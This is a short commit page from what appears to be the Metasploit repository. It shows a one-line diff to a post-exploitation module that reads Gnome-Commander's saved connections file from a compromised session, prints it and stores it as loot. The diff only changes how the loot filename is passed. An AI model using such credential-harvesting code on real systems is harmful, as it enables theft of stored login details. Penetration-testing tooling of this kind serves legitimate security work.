Update gnome_commander_creds.rb
parent
2e5c2a514b
commit
48982b3b89
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
|
|||
begin
|
||||
print_good("File found : #{connections_file}")
|
||||
print_line(read_file(connections_file))
|
||||
p = store_loot("connections", "text/plain", session, read_file(connections_file), "connections_file", "Gnome-Commander connections")
|
||||
p = store_loot("connections", "text/plain", session, read_file(connections_file), connections_file, "Gnome-Commander connections")
|
||||
print_good ("Connections file saved to #{p}")
|
||||
print_line()
|
||||
rescue EOFError
|
||||
|
|
Loading…
Reference in New Issue